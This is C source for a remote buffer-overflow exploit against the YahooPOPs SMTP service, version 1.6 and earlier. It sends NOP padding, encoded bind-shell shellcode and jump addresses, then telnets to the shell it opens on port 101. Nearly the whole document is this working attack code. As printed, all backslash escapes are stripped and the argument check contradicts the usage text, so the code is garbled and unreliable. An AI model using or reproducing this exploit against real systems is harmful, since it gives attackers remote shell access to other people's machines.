Code:
//Diabolic Crab's exploit for YahooPOPs <= 1.6 SMTP
//
//www.hackerscenter.com
//For more work check out, http://icis.digitalparadox.org
//This was done at 4 am so escuse the messy code if any
//Good job class101 on the windows version ;)
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <netdb.h>
#include <errno.h>
#include <unistd.h>
#include <sys/socket.h>
char scode[] = //Bind shell on port 101, taken from the windows exploit by class101
"xEB"
"x0Fx58x80x30x88x40x81x38x68x61x63x6Bx75xF4xEBx05xE8xECxFFxFF"
"xFFx60xDEx88x88x88xDBxDDxDExDFx03xE4xACx90x03xCDxB4x03xDCx8D"
"xF0x89x62x03xC2x90x03xD2xA8x89x63x6BxBAxC1x03xBCx03x89x66xB9"
"x77x74xB9x48x24xB0x68xFCx8Fx49x47x85x89x4Fx63x7AxB3xF4xACx9C"
"xFDx69x03xD2xACx89x63xEEx03x84xC3x03xD2x94x89x63x03x8Cx03x89"
"x60x63x8AxB9x48xD7xD6xD5xD3x4Ax80x88xD6xE2xB8xD1xECx03x91x03"
"xD3x84x03xD3x94x03x93x03xD3x80xDBxE0x06xC6x86x64x77x5Ex01x4F"
"x09x64x88x89x88x88xDFxDExDBx01x6Dx60xAFx88x88x88x18x89x88x88"
"x3Ex91x90x6Fx2Cx91xF8x61x6DxC1x0ExC1x2Cx92xF8x4Fx2Cx25xA6x61"
"x51x81x7Dx25x43x65x74xB3xDFxDBxBAxD7xBBxBAx88xD3x05xC3xA8xD9"
"x77x5Fx01x57x01x4Bx05xFDx9CxE2x8FxD1xD9xDBx77xBCx07x77xDDx8C"
"xD1x01x8Cx06x6Ax7AxA3xAFxDCx77xBFx77xDDxB8xB9x48xD8xD8xD8xD8"
"xC8xD8xC8xD8x77xDDxA4x01x4FxB9x53xDBxDBxE0x8Ax88x88xEDx01x68"
"xE2x98xD8xDFx77xDDxACxDBxDFx77xDDxA0xDBxDCxDFx77xDDxA8x01x4F"
"xE0xCBxC5xCCx88x01x6Bx0Fx72xB9x48x05xF4xACx24xE2x9DxD1x7Bx23"
"x0Fx72x09x64xDCx88x88x88x4ExCCxACx98xCCxEEx4FxCCxACxB4x89x89"
"x01xF4xACxC0x01xF4xACxC4x01xF4xACxD8x05xCCxACx98xDCxD8xD9xD9"
"xD9xC9xD9xC1xD9xD9xDBxD9x77xFDx88xE0xFAx76x3Bx9Ex77xDDx8Cx77"
"x58x01x6Ex77xFDx88xE0x25x51x8Dx46x77xDDx8Cx01x4BxE0x77x77x77"
"x77x77xBEx77x5Bx77xFDx88xE0xF6x50x6AxFBx77xDDx8CxB9x53xDBx77"
"x58x68x61x63x6Bx90";
static char payload[1024];
char jmp[]="x23x9bx02x10"; //JMP ESP
char jmpebx[]="xffxe3"; //JMP EBX
void usage(char* us);
void ver();
int main(int argc, char *argv[])
{
ver();
char grab[999];
int sock;
if (argc<4){
usage(argv[0]);return -1;
}
int ip=htonl(inet_addr(argv[1])), port, size, x;
if (argc==3){port=atoi(argv[2]);}
else port=25;
struct hostent *aap;
struct sockaddr_in addr;
if((aap=(struct hostent *)gethostbyname(argv[1]))==NULL) {
perror("Gethostbyname()");
exit(1); }
if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))<0) {
perror("Socket()");
exit(1); }
addr.sin_family=AF_INET;
addr.sin_port=htons(port);
memcpy((char *)&addr.sin_addr,(char *)aap->h_addr,aap->h_length);
if(connect(sock,(struct sockaddr *)&addr,sizeof(addr))!=0) {
perror("Connect()");
exit(0); }
printf ("[+] Connectedn");
fflush(stdin);
sleep(2);
read(sock,grab,200);
printf ("[+] Reading Bannern");
if (!strstr(grab,"220 YahooPOPs")) {
printf("[+] this is not a YahooPOPS server, quitting...n");
return -1; }
printf ("[+] Found YahooPOP's Servern");
size=508-sizeof(scode);
memset(payload,0,sizeof(payload));
for (x=0;x<size;x++){strcat(payload,"x90");}
strcat(payload,scode);strcat(payload,jmp);strcat(payload,jmpebx);
printf ("[+] Sending Shellcoden");
if (send(sock, payload, strlen(payload), 0) < 0) {
perror("Send()");
exit(0); }
printf ("[+] Sleep for 3 secondsn");
sleep(3);
char hack[100];
sprintf (hack, "telnet %s 101", argv[1]);
system (hack);
return 0;
}
void usage(char* us)
{
printf("Usage: ./dc_ypop ip portn");
printf("The exploit binds a shell to the port 101.n");
return;
}
void ver()
{
printf ("################################################################n");
printf ("# Diabolic Crab's Bind Shell Exploit for YahooPOPS <= 1.6 SMTP #n");
printf ("# www.hackerscenter.com #n");
printf ("# Credits to Behrang Fouladi for finding this bug #n");
printf ("################################################################n");
} |
